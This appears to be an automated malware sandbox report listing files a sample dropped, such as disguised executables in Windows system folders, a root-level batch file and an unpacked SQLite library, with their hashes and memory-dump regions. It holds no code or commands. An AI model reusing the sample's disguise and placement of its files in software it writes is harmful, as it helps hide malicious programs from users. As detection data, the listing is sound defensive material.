C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\LOG.old
Filesize
291B

MD5
b2df2290f73e0eac3e80d78eb1ef3602

SHA1
9c079ec457fa774394508671948bf4147b9644b6

SHA256
838554e15d2145dd1fc86d1fd4e91a263e859a02a199688f8509f6d73b38f652

SHA512
791706e08f6171fa7a13a8bb70ae835dd1041e8f4cc72fe7ee2d081771222ef950dab0e17887ea88ba97ac73fca0b02f74cadda27e210b9c2b1877d8b542961d

Download Submit
C:\Users\Admin\AppData\Roaming\Gongle\aCZSJZWJ81\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Windows\GameBarPresenceWriter\runtimedotnet.exe
Filesize
141KB

MD5
4b9dc0373a13ef476985f74bc69c45b5

SHA1
3c0838e27f2c13e5ee4580303fa1a314ed8678ba

SHA256
821691e0305db7d5868f4ac5bd7b2c16253b23054ac75783d1ca75835680c17f

SHA512
bf6ac16fef0262e94350d04b3454df7f30bed8cd55a5f0aafae6c9a14caf0db40f4b97a1adb700de42824237adf8540258e69aa9e0cc90acbc5d3606bbf4f6d5

Download Submit
C:\Windows\Tasks\VOLUMEID.exe
Filesize
12KB

MD5
daa5d2f83152707d674bae2eb7238767

SHA1
503bc6538b0334f3548328d299bc7f95d08f7840

SHA256
768c586ee4e1172190dfd0f6b3185b79dd2f72e332ef1c22faa702548d8b579e

SHA512
d71146f7f0d5b016f4ae1ae32dbc1db6a4702360c942c923cdeb416edc82709b607c98798449f660b65818be7c79e8108095212f2173bed7615681650a137502

Download Submit
C:\plasmaserial.bat
Filesize
855B

MD5
ab84096b01cdcc304e442659c12edfc3

SHA1
f42281b6ab6e7373307091381a300bc659076ecc

SHA256
f943b4a7127ef21b45db4731a3df69431c051f8e6b3e4c13c2b4ea51616f1045

SHA512
601dedb7d0a64c2e12a63c548ffd1801c67c8cc4dcae88848cd897d3d0ea34480169b3714a538e86eac71d6d577d4b82644aca1a87e7994b8a619f71b4b1aeca

Download Submit
\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll
Filesize
1.4MB

MD5
6f2fdecc48e7d72ca1eb7f17a97e59ad

SHA1
fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056

SHA256
70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809

SHA512
fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b

Download Submit
memory/356-194-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download
memory/356-192-0x00007FFE89290000-0x00007FFE89292000-memory.dmp

Filesize
8KB

Download
memory/356-193-0x00007FFE892A0000-0x00007FFE892A2000-memory.dmp

Filesize
8KB

Download
memory/2668-229-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download
memory/2944-222-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download
memory/3116-57-0x0000000013570000-0x000000001357A000-memory.dmp

Filesize
40KB

Download
memory/3116-24-0x0000000001110000-0x000000000111A000-memory.dmp

Filesize
40KB

Download
memory/3116-52-0x00000000079E0000-0x00000000079F2000-memory.dmp

Filesize
72KB

Download
memory/3116-55-0x00000000063E0000-0x0000000006446000-memory.dmp

Filesize
408KB

Download
memory/3116-56-0x0000000006490000-0x000000000649A000-memory.dmp

Filesize
40KB

Download
memory/3116-167-0x00000000135D0000-0x0000000013682000-memory.dmp

Filesize
712KB

Download
memory/3116-58-0x000000000A8B0000-0x000000000A8BC000-memory.dmp

Filesize
48KB

Download
memory/3116-59-0x000000000D600000-0x000000000D608000-memory.dmp

Filesize
32KB

Download
memory/3116-22-0x0000000001140000-0x000000000114C000-memory.dmp

Filesize
48KB

Download
memory/3116-25-0x0000000004F40000-0x0000000004FD2000-memory.dmp

Filesize
584KB

Download
memory/3116-26-0x00000000054E0000-0x00000000059DE000-memory.dmp

Filesize
5.0MB

Download
memory/3116-29-0x0000000011610000-0x00000000122B2000-memory.dmp

Filesize
12.6MB

Download
memory/3116-28-0x000000000A8C0000-0x000000000B4C0000-memory.dmp

Filesize
12.0MB

Download
memory/3116-186-0x00000000064B0000-0x00000000064BA000-memory.dmp

Filesize
40KB

Download
memory/3116-168-0x0000000014930000-0x0000000014952000-memory.dmp

Filesize
136KB

Download
memory/3116-169-0x00000000149E0000-0x0000000014A56000-memory.dmp

Filesize
472KB

Download
memory/3116-170-0x0000000014980000-0x000000001499E000-memory.dmp

Filesize
120KB

Download
memory/3116-171-0x0000000014AB0000-0x0000000014B00000-memory.dmp

Filesize
320KB

Download
memory/3116-172-0x0000000014B00000-0x0000000014B6A000-memory.dmp

Filesize
424KB

Download
memory/3116-173-0x0000000014B70000-0x0000000014EC0000-memory.dmp

Filesize
3.3MB

Download
memory/3116-174-0x0000000014EC0000-0x0000000014F0B000-memory.dmp

Filesize
300KB

Download
memory/3116-178-0x0000000014F70000-0x0000000014FAC000-memory.dmp

Filesize
240KB

Download
memory/3116-179-0x0000000014F30000-0x0000000014F50000-memory.dmp

Filesize
128KB

Download
memory/3116-23-0x00000000027E0000-0x00000000027FA000-memory.dmp

Filesize
104KB

Download
memory/3332-208-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download
memory/3416-45-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/3416-40-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/3416-43-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/3416-46-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/3416-41-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/3632-215-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download
memory/3764-4-0x0000000073D3E000-0x0000000073D3F000-memory.dmp

Filesize
4KB

Download
memory/3764-18-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/3764-5-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/3764-2-0x0000000073D30000-0x000000007441E000-memory.dmp

Filesize
6.9MB

Download
memory/3764-0-0x0000000073D3E000-0x0000000073D3F000-memory.dmp

Filesize
4KB

Download
memory/3764-1-0x0000000000A40000-0x0000000000A4A000-memory.dmp

Filesize
40KB

Download
memory/4220-202-0x0000000140000000-0x0000000141B2E000-memory.dmp

Filesize
27.2MB

Download